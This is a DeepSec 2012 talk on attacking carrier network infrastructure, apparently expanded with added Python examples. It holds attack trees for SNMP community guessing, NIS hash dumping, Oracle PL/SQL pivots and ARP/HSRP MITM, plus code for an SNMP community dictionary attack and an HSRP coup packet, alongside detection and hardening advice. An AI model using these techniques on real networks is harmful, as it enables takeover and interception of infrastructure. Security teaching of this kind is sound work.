
Page 1: DeepSec 2012 Own the Network – Own the Data

www.dynetics.com

Information Engineering Solutions

DeepSec 2012

Own the Network – Own the Data

Paul Coggin
Internetwork Consulting Solutions Architect
[email protected]

Page 2

UNCLASSIFIED

Introduction

•  Network Security Architect – 18 years experience
•  BS Math, MS Computer Information Systems, graduate studies in IA & Security
•  Certifications: Cisco, ISC^2, EC-Council
•  Cisco and EC-Council instructor
•  Utilities, telecommunications and service provider experience
   -  Transport: Optical (DWDM, SONET), MPLS, 10G Ethernet
   -  Triple Play services: Voice, IPTV
   -  OSS and network management
   -  Access networks: HFC cable, DSL, FTTX, wireless, ATM, Frame Relay
   -  Security: penetration testing, network security architecture, vulnerability analysis
   -  Routing and switching

Page 3

Next Generation Network Architecture

[Diagram: example carrier network. Core: MPLS/IP P routers, Internet P router, SONET/SDH ring, DWDM. Metro access/aggregation edge: hub & spoke and GE rings, U-PE/PE-AGG, L3VPN-PE routers, BRAS/ISG policy & control plane, SCE, lawful intercept. Customer edge: DSL or fiber CE for residential, telecommuter, SOHO, branch office and enterprise sites; cell tower mobile IP backhaul; energy distribution, smart grid, ICS/SCADA and water/sewer treatment plant connections. Control/applications/NMS: network management, provisioning, assurance, billing and situational awareness servers, policy server, DHCP server, AAA server, application services (web server, VoIP GW, SIP proxy, video headend IPTV/VOD). Data, voice and video services; TCP/IP wire tap insertion point.]

•  Demand for bandwidth driving optical network growth; telcos, …
•  Triple Play and Smart Grid services
•  TCP/IP wire tap
•  Cellular mobile IP backhaul
•  Carrier-class telco networks: 10 Gig, highly redundant
•  Thousands of devices
•  Internet to customer premise automation

Page 4

Transport Networks

IP+Optical

•  IP MPLS based network services over DWDM
•  IP services over SONET
•  Legacy TDM services over SONET
•  Cell tower T1 backhaul to support 3G and 4G

Management Plane

The equipment in each layer of the transport network has its own network element management system, with trust relationships and interdependencies between the layers. Each of the following has to be secured:
-  Routing protocols
-  In-band / out-of-band management
-  Provisioning
-  Control, management and data planes

Page 5

Cyber Attack Model

OSI model (7 Application, 6 Presentation, 5 Session, 4 Transport, 3 Network, 2 Data Link, 1 Physical) mapped to the TCP/IP model (Application, Transport, Internet, Network Interface), with the attack classes available at each level:

-  Physical media (RF, fiber, copper) and network interface: MITM (intercept, modify), DoS, RF (jam, replay)
-  Internet and transport: session hijacking and spoofing (intercept, modify, bypass network security), DoS
-  Application: malware, OS and application level; remote and privilege escalation exploits, bots, phishing

Page 6

IP Transport Cyber Attack Vectors

Network and system architecture - centralized, distributed, redundant - physical and logical

Transport network - RF, fiber, copper

Network protocols - routing, switching, redundancy - apps, client/server

Client/server architecture - HW, SW, apps, RDBMS - open source - commercial

Trust relationships - network management and network devices - billing, middleware, provisioning

Common HW/SW configuration settings

Transport Network Infrastructure Cyber Attack Tree

Network infrastructure attack vectors. Every branch below ends in the same leaf: Own Network Infrastructure.

SNMP
-  SNMP community string dictionary attack, with spoofing, to download router/switch configuration
-  Build new router configuration file to enable further privilege escalation
-  Upload new configuration file using compromised SNMP RW string
-  Own network infrastructure

UNIX NetMgt server running NIS v1
-  ypcat -d <domain> <server IP> passwd: grab shadow file hashes
-  Crack passwords
-  Access server directly
-  Exploit ACL trust relationship: attack SNMP/Telnet/SSH
-  Find NetMgt passwords and SNMP config files; discover backup HW configs
-  Crack passwords
-  Own network infrastructure

HP OpenView server with Oracle
-  Enumerate Oracle TNS listener to identify default SIDs
-  Further enumerate Oracle SIDs to identify default DBA system-level accounts/passwords
-  Login to Oracle DB with discovered DBA privileged account
-  Run Oracle SQL commands; execute OS commands; add new privileged OS account
-  Further enumerate Oracle SIDs to identify user accounts; perform dictionary attack; crack passwords
-  Execute OS commands from Oracle PL/SQL; attack network from DB
-  Find NetMgt passwords, SNMP info, OS password files
-  Use new privileged OS account to escalate privileged access to network
-  Own network infrastructure

Network management application
-  Attempt to login using default login/password
-  Reconfigure router or switch
-  Own network infrastructure

MITM ARP poisoning
-  Sniffing: capture SNMP community strings and unencrypted logins/passwords, protocol passwords
-  Configure device for further privilege escalation
-  Own network infrastructure

Telnet/SSH dictionary attack against routers/switches/NetMgt server
-  Build new router configuration file to enable further privilege escalation
-  Inject new routes or bogus protocol packets
-  Own network infrastructure

Attack vectors - deny, disrupt, delay, intercept, exploit:
-  Man in the middle attacks (MITM)
-  Network protocols
-  IP spoofing
-  Apps / RDBMS / NetMgt
-  Traffic analysis
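Two leaves of the tree above, "SNMP community string dictionary attack" and "capture SNMP community strings" by sniffing, rest on one property of SNMPv1/v2c: the community string is a cleartext field of every message. The following added example (not code from the slides, written for this page) encodes an SNMPv1 GetRequest by hand with plain ASN.1 BER per RFC 1157, pulls the community back out of a captured message, and shows that a dictionary attack is just one GetRequest per candidate. The wordlist and the stand-in agent are constructed so the block runs offline.

```python
"""SNMPv1 GetRequest builder and community-string extractor, BER by hand.

Added example, not code from the DeepSec 2012 slides.  The encoding is
plain ASN.1 BER and the SNMPv1 message layout of RFC 1157; the wordlist
and the stand-in agent below are constructed for the example.
"""

SYS_DESCR = "1.3.6.1.2.1.1.1.0"   # sysDescr.0, the usual first probe


def _ber_len(n: int) -> bytes:
    """BER length: one byte below 128, otherwise 0x80|count then the bytes."""
    if n < 0x80:
        return bytes([n])
    body = n.to_bytes((n.bit_length() + 7) // 8, "big")
    return bytes([0x80 | len(body)]) + body


def _tlv(tag: int, value: bytes) -> bytes:
    return bytes([tag]) + _ber_len(len(value)) + value


def _ber_int(v: int) -> bytes:
    """Non-negative INTEGER, minimal two's complement (0x00 prefix if bit 7 set)."""
    return _tlv(0x02, v.to_bytes((v.bit_length() + 8) // 8, "big", signed=True))


def _ber_oid(dotted: str) -> bytes:
    """OBJECT IDENTIFIER: first two arcs packed as 40*a+b, the rest base-128."""
    arcs = [int(a) for a in dotted.split(".")]
    out = bytearray([40 * arcs[0] + arcs[1]])
    for arc in arcs[2:]:
        chunk = [arc & 0x7F]
        arc >>= 7
        while arc:
            chunk.append(0x80 | (arc & 0x7F))
            arc >>= 7
        out.extend(reversed(chunk))
    return _tlv(0x06, bytes(out))


def build_get_request(community: str, oid: str, request_id: int = 1) -> bytes:
    """SNMPv1 GetRequest for one OID.  The community is a cleartext OCTET
    STRING right after the version field, so any sniffer on the path sees it."""
    varbind = _tlv(0x30, _ber_oid(oid) + _tlv(0x05, b""))          # { oid, NULL }
    pdu = _tlv(0xA0, _ber_int(request_id) + _ber_int(0) + _ber_int(0)
               + _tlv(0x30, varbind))                               # GetRequest-PDU
    return _tlv(0x30, _ber_int(0) + _tlv(0x04, community.encode()) + pdu)


def _read_tlv(buf: bytes, pos: int):
    """Return (tag, value, position after the TLV) for the TLV starting at pos."""
    tag, length, pos = buf[pos], buf[pos + 1], pos + 2
    if length & 0x80:
        n = length & 0x7F
        length, pos = int.from_bytes(buf[pos:pos + n], "big"), pos + n
    return tag, buf[pos:pos + length], pos + length


def extract_community(packet: bytes):
    """Community string of a captured SNMPv1/v2c message, or None for anything
    else (an SNMPv3 message carries version 3 and has no community field)."""
    tag, msg, _ = _read_tlv(packet, 0)
    if tag != 0x30:
        return None
    vtag, version, pos = _read_tlv(msg, 0)
    if vtag != 0x02 or int.from_bytes(version, "big") not in (0, 1):   # 0 = v1, 1 = v2c
        return None
    ctag, community, _ = _read_tlv(msg, pos)
    return community.decode("latin-1") if ctag == 0x04 else None


def guess_community(candidates, send):
    """Dictionary attack: one GetRequest per candidate.  `send(packet)` must
    return True when the agent answered; a real agent silently drops a wrong
    community, so "no reply" is the failure signal.  Returns the first hit."""
    for rid, word in enumerate(candidates, start=1):
        if send(build_get_request(word, SYS_DESCR, rid)):
            return word
    return None


def fake_agent(configured: str):
    """Offline stand-in for a device: answers only when the community matches."""
    return lambda pkt: extract_community(pkt) == configured


WORDLIST = ["public", "private", "cisco", "admin", "monitor"]   # constructed sample list

if __name__ == "__main__":
    print("GetRequest sysDescr.0 as 'public':", build_get_request("public", SYS_DESCR).hex())
    print("sniffed community:", extract_community(build_get_request("wr1te", SYS_DESCR)))
    print("dictionary hit:", guess_community(WORDLIST, fake_agent("private")))
```

Swapping `fake_agent` for a UDP socket that sends to port 161 and waits briefly for a reply turns `guess_community` into the live check from the attack tree. The defensive reading is the same bytes: nothing in an SNMPv1/v2c message protects the community, so only SNMPv3 with authentication and privacy keeps the credential off the wire.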

Page 7

What Can You Do With a Router or Switch?

•  Inject route prefixes to hide the source of an attack, or enable a more complex MITM attack by crafting routing protocol packets
•  Configure route maps to forward traffic based on ACL criteria
•  Lawful Intercept – forward a copy of interesting traffic using CISCO-TAP-MIB, CISCO-TAP2-MIB, CISCO-IP-TAP-MIB
•  SPAN ports (port mirroring) to enhance packet capturing capability
•  Review routing tables to identify key targets
•  DoS or MITM by crafting HSRP, routing protocol, or spanning-tree packets
•  Configure a router to be a DHCP server to create a MITM attack vector

Page 8

Example Cyber Attack Exploiting Trust Relationship

Reconnaissance: social networking & career sites, IP "whois" information, search engines, operating system version detection, port scanning, ping sweeps. Scans against common ports outside the corporate networks were used to narrow down targets of interest.

Identified two target subnets and discovered product use with known vulnerabilities *

* Employee's resume on the LinkedIn social networking site references training in specific product technologies

First Subnet – Directory Traversal Exploit

•  Installed web-based shell prompt to execute commands without a log trail
•  Enumerated internal network and services on 2000 hosts

Network Information Service (NIS)

•  After discovering NIS, ypcat command executed
•  Dumped a list of all usernames and password hashes on the system

Second Subnet - Firewall

•  https management interface for firewalls was accessible from the public Internet
•  Brute force password cracking could compromise the system (did not perform)

Page 9

Oracle

•  Oracle is commonly used with HP OpenView for inventory management
•  Default user accounts/passwords enabled and/or weak passwords typically found
•  Unsecured RDBMS - as easy a target as an unpatched MS NT 4.0 server
•  Open TNS listener / SQL*Net listener
•  RDBMS can be used for executing OS shell commands
•  How about using the database and PL/SQL to attack the network?

The network infrastructure ACLs trust the network management server IP address.
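The last sentence is the whole pivot: the devices do not trust HP OpenView or a particular administrator, they trust a source IP address. The following added example (not code from the slides or from Cisco) evaluates a constructed IOS-style configuration, a standard access-list plus `snmp-server community` lines bound to it, the way the device does. The addresses, community strings and ACL number are made-up sample values. Run as-is it shows the same RW string rejected from an attacker's workstation and accepted from the NMS address, which is exactly what PL/SQL running OS commands on the NMS hands the attacker.

```python
"""Why the network trusts whatever runs on the management server.

Added example, not code from the DeepSec 2012 slides or from Cisco.  It
evaluates a constructed IOS-style configuration the way the device does:
a source-address ACL binds the SNMP RW string to the NMS *host*, not to
any user or process on it.  Addresses, community strings and the ACL
number are made-up sample values.
"""
import ipaddress

# Constructed configuration fragment (not from any real device).
DEVICE_CONFIG = """\
access-list 10 permit 10.10.1.5
access-list 10 deny any
snmp-server community m0nitor RO 10
snmp-server community wr1te RW 10
"""

NMS_ADDRESS = "10.10.1.5"        # assumed HP OpenView / Oracle host the ACL trusts
ATTACKER_ADDRESS = "10.20.7.33"  # assumed attacker workstation elsewhere on the LAN


def _matches(entry_addr: str, wildcard: str, src: str) -> bool:
    """IOS wildcard-mask semantics: a set bit in the mask means 'don't care'."""
    care = ~int(ipaddress.IPv4Address(wildcard)) & 0xFFFFFFFF
    entry = int(ipaddress.IPv4Address(entry_addr))
    source = int(ipaddress.IPv4Address(src))
    return (entry & care) == (source & care)


def parse_config(text: str):
    """Return ({acl_number: [(action, address, wildcard), ...]},
               {community: (mode, acl_number_or_None)})."""
    acls, communities = {}, {}
    for raw in text.splitlines():
        parts = raw.split()
        if parts[:1] == ["access-list"]:
            number, action, target = parts[1], parts[2], parts[3]
            if target == "any":
                addr, wild = "0.0.0.0", "255.255.255.255"
            elif target == "host":
                addr, wild = parts[4], "0.0.0.0"
            else:   # "address [wildcard]"; a missing wildcard means an exact host
                addr, wild = target, (parts[4] if len(parts) > 4 else "0.0.0.0")
            acls.setdefault(number, []).append((action, addr, wild))
        elif parts[:2] == ["snmp-server", "community"]:
            mode = parts[3].upper() if len(parts) > 3 else "RO"
            communities[parts[2]] = (mode, parts[4] if len(parts) > 4 else None)
    return acls, communities


def acl_permits(acls, number: str, src: str) -> bool:
    """First matching entry wins; every IOS ACL ends in an implicit deny."""
    for action, addr, wild in acls.get(number, []):
        if _matches(addr, wild, src):
            return action == "permit"
    return False


def snmp_access(config: str, src: str, community: str):
    """Access granted to an SNMP request from `src` carrying `community`:
    'RO', 'RW', or None (unknown string, or source blocked by the ACL)."""
    acls, communities = parse_config(config)
    if community not in communities:
        return None
    mode, acl = communities[community]
    if acl is not None and not acl_permits(acls, acl, src):
        return None
    return mode


if __name__ == "__main__":
    for who, src in (("attacker workstation", ATTACKER_ADDRESS),
                     ("pivot through the NMS", NMS_ADDRESS)):
        print(f"{who:22} {src:12} with RW string -> "
              f"{snmp_access(DEVICE_CONFIG, src, 'wr1te')}")
```

The evaluator only models what the slide describes (standard ACLs matched on source address); the point it makes is that hardening the database and the management host is part of securing the routers, because the ACL cannot tell them apart.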

 

         

Page 10

Oracle Username Password Enumeration

Page 11

Oracle Password Dictionary Attack

Page 12

Run OS Commands From Oracle PL/SQL

Page 13

http://phoenixlabs.org/pg2/faq/

Example of a Network Exploit Using Oracle PL/SQL

•  Run the SNMPWALK utility against a Cisco IOS device using the SNMP read-only community string
•  Cisco routers and switches running IOS 12.0 through 12.1 have a known vulnerability where, if you know the unprivileged read-only SNMP community string, you can obtain the privileged read/write string
•  TFTP upload SNMPWALK using Oracle PL/SQL

Page 14

PL/SQL Query - SNMPWALK Results

http://phoenixlabs.org/pg2/faq/

SNMP Read/Write Community String

Page 15

HSRP MITM – Packet Analysis

HSRP Password Clear Text

Page 16

HSRP MITM – Packet Crafting

[Diagram: two routers sharing an HSRP group; a rogue insider on the same segment sends a crafted HSRP coup packet with a higher priority.]
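The two HSRP slides (the cleartext password in the capture, then the coup packet with a higher priority) fit in twenty bytes of UDP payload. The following added example (not code from the slides) decodes an HSRP version 0 packet per RFC 2281, reads the authentication string the capture leaks, builds the coup packet a rogue insider would send, and gives the defender's check for the same packet. The captured hello, group, priority and addresses are constructed for the example; only the payload is built, and putting it on the wire (224.0.0.2, UDP port 1985, TTL 1) is deliberately left out.

```python
"""HSRP (RFC 2281, version 0) packet analysis and crafting.

Added example, not code from the DeepSec 2012 slides.  The captured hello
below is constructed; the group, priority and addresses are made-up.
"""
import struct
from dataclasses import dataclass

HSRP_PORT = 1985
HSRP_MCAST = "224.0.0.2"
OPCODES = {0: "hello", 1: "coup", 2: "resign"}
STATES = {0: "initial", 1: "learn", 2: "listen", 4: "speak", 8: "standby", 16: "active"}
# version, opcode, state, hellotime, holdtime, priority, group, reserved, auth[8], virtual IP[4]
_FMT = "!BBBBBBBB8s4s"


@dataclass
class Hsrp:
    opcode: int
    state: int
    hellotime: int
    holdtime: int
    priority: int
    group: int
    auth: str          # sent in the clear, default "cisco"
    virtual_ip: str

    def pack(self) -> bytes:
        auth = self.auth.encode()[:8].ljust(8, b"\x00")
        vip = bytes(int(o) for o in self.virtual_ip.split("."))
        return struct.pack(_FMT, 0, self.opcode, self.state, self.hellotime,
                           self.holdtime, self.priority, self.group, 0, auth, vip)

    @classmethod
    def unpack(cls, payload: bytes) -> "Hsrp":
        (version, opcode, state, hello, hold, prio, group, _res,
         auth, vip) = struct.unpack(_FMT, payload[:20])
        if version != 0:
            raise ValueError("only HSRP version 0 is handled here")
        return cls(opcode, state, hello, hold, prio, group,
                   auth.rstrip(b"\x00").decode("latin-1"),
                   ".".join(str(b) for b in vip))


# Constructed capture: active router, group 1, priority 100, auth "cisco", VIP 10.0.0.1.
CAPTURED_HELLO = bytes.fromhex("000010030a640100636973636f0000000a000001")


def craft_coup(observed: Hsrp, priority: int = 255) -> bytes:
    """The takeover packet: same group, same virtual IP and the same cleartext
    auth string the capture leaked, with a priority above the active router's
    (255 is the maximum and beats the default of 100).  Sent from Speak state."""
    if priority <= observed.priority:
        raise ValueError("a coup must carry a higher priority than the active router")
    return Hsrp(opcode=1, state=4, hellotime=observed.hellotime,
                holdtime=observed.holdtime, priority=priority, group=observed.group,
                auth=observed.auth, virtual_ip=observed.virtual_ip).pack()


def is_takeover_attempt(payload: bytes, configured_max_priority: int) -> bool:
    """Defender's check for a capture or an IDS rule: a hello or coup whose
    priority is higher than anything the legitimate routers are configured with."""
    pkt = Hsrp.unpack(payload)
    return pkt.opcode in (0, 1) and pkt.priority > configured_max_priority


if __name__ == "__main__":
    hello = Hsrp.unpack(CAPTURED_HELLO)
    print(f"active router leaks auth={hello.auth!r} group={hello.group} prio={hello.priority}")
    coup = craft_coup(hello)
    print("coup payload:", coup.hex())
    print("flagged by priority check:", is_takeover_attempt(coup, configured_max_priority=110))
```

The priority check only works because the legitimate priorities are known; the durable fix is MD5 authentication on the HSRP group (the cleartext auth string the first slide shows is what makes the coup trivial) and, where the platform supports it, filtering HSRP on ports that should never source it.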

Page 17

Instrumentation

Secure Visualization and Instrumentation (SVI) Enables Network Forensics

Root Cause Troubleshooting and Analysis

Page 18

Incident Response Network Forensics using SVI – Case #1

[Diagram: example carrier-class network. Multiple routers / service gateways deliver Internet services, IPTV & radio services, video on demand services and voice services over private virtual circuits, with separation of services onto VLANs, through an IP DSLAM to the DSL CPE at the residential customer (PC, TV, set-top box, IP phone).]

Network instrumentation is critical to security: deep inspection and monitoring of network flows / packets.

•  Foreign IP address attacked the DSL modem.
•  Changed its DNS address to a relay box in the US (the "bad guy" relay server).
•  Hijacked web requests and web traffic.

Page 19

Incident Response Network Management Using SVI – Case #2

[Diagram: the same example carrier-class network as Case #1.]

Protocol and logical architecture knowledge is key. SVI - deep inspection and monitoring of network flows / packets.

Customer employee mistakenly bridges the data and video networks:

•  Malware existed on data (ISP) user computers – the malware sends ICMP packets to DoS a target.
•  Video equipment encapsulated the DoS packets in all multicast groups – sent to all video devices / users.
•  The customer with SVI was alerted to unusual traffic on the multicast VLAN for video.
•  Called for remote incident analysis / forensics; the network packets showed multicasting of "bad info" and misconfiguration of the network's logical data flows.
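Both cases were caught from flow and packet visibility rather than from a host alert, and both reduce to a rule a collector can evaluate. The following added example (not code from the slides or from any product) runs those rules over constructed flow records of the kind a probe or NetFlow exporter produces: for Case #1, subscriber CPE resolving DNS anywhere other than the provider's resolvers, plus the inbound hit on a CPE management port that caused it; for Case #2, anything that is not IPTV or IGMP addressed to a multicast group inside the video VLAN. The resolver addresses, subscriber pool, VLAN id, ports and every flow are made-up sample values.

```python
"""Flow-based checks behind the two SVI incident cases.

Added example, not from the DeepSec 2012 slides or any product.  Resolver
addresses, the subscriber pool, VLAN ids, ports and all flows are assumed,
constructed values.
"""
from collections import namedtuple
from ipaddress import ip_address, ip_network

Flow = namedtuple("Flow", "src dst proto dport vlan packets")

PROVIDER_RESOLVERS = {"198.51.100.53", "198.51.100.54"}   # assumed provider resolvers
SUBSCRIBER_SPACE = ip_network("100.64.0.0/10")             # assumed CPE address pool
VIDEO_VLAN = 300                                           # assumed IPTV multicast VLAN
VIDEO_PROTOCOLS = {("udp", 5004), ("igmp", 0)}             # RTP video and IGMP joins (assumed)

# Constructed sample export: a few normal flows plus the two incidents.
SAMPLE_FLOWS = [
    Flow("100.64.3.10", "198.51.100.53", "udp", 53, 100, 12),   # normal DNS to the provider
    Flow("100.64.3.10", "203.0.113.9", "tcp", 80, 100, 40),      # normal web
    Flow("100.64.7.22", "192.0.2.77", "udp", 53, 100, 31),       # case 1: CPE now asks a foreign resolver
    Flow("192.0.2.77", "100.64.7.22", "tcp", 8080, 100, 6),      # case 1: the inbound hit on the CPE admin port
    Flow("10.9.0.5", "239.1.1.1", "udp", 5004, 300, 9000),       # normal IPTV multicast from the headend
    Flow("100.64.3.10", "239.1.1.1", "igmp", 0, 300, 2),         # normal IGMP join
    Flow("100.64.5.41", "239.1.1.1", "icmp", 0, 300, 50000),    # case 2: ICMP flood replicated into the video group
]


def dns_hijack_suspects(flows):
    """Case 1: subscriber hosts whose DNS goes to a resolver the provider does
    not run.  Returns {cpe_address: {resolver_address, ...}}."""
    out = {}
    for f in flows:
        if (f.proto == "udp" and f.dport == 53
                and ip_address(f.src) in SUBSCRIBER_SPACE
                and f.dst not in PROVIDER_RESOLVERS):
            out.setdefault(f.src, set()).add(f.dst)
    return out


def cpe_admin_hits(flows, admin_ports=(23, 80, 443, 8080)):
    """Case 1, the cause: connections from outside the subscriber pool to a CPE
    management port.  Returns [(remote, cpe, port), ...]."""
    return [(f.src, f.dst, f.dport) for f in flows
            if f.proto == "tcp" and f.dport in admin_ports
            and ip_address(f.dst) in SUBSCRIBER_SPACE
            and ip_address(f.src) not in SUBSCRIBER_SPACE]


def multicast_vlan_anomalies(flows, min_packets=1000):
    """Case 2: non-video traffic to a multicast group inside the video VLAN.
    Returns [(src, group, proto, packets), ...] largest first."""
    hits = [(f.src, f.dst, f.proto, f.packets) for f in flows
            if f.vlan == VIDEO_VLAN and ip_address(f.dst).is_multicast
            and (f.proto, f.dport) not in VIDEO_PROTOCOLS
            and f.packets >= min_packets]
    return sorted(hits, key=lambda h: -h[3])


if __name__ == "__main__":
    print("case 1, CPE using foreign resolver:", dns_hijack_suspects(SAMPLE_FLOWS))
    print("case 1, inbound CPE admin hits:   ", cpe_admin_hits(SAMPLE_FLOWS))
    print("case 2, non-video in video VLAN:   ", multicast_vlan_anomalies(SAMPLE_FLOWS))
```

The multicast check is the one that needs the "protocol and logical architecture knowledge" the slide calls for: without knowing which VLAN carries video and which protocols belong there, 50 000 ICMP packets to a group address look like any other flow.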

Page 20

   

Questions?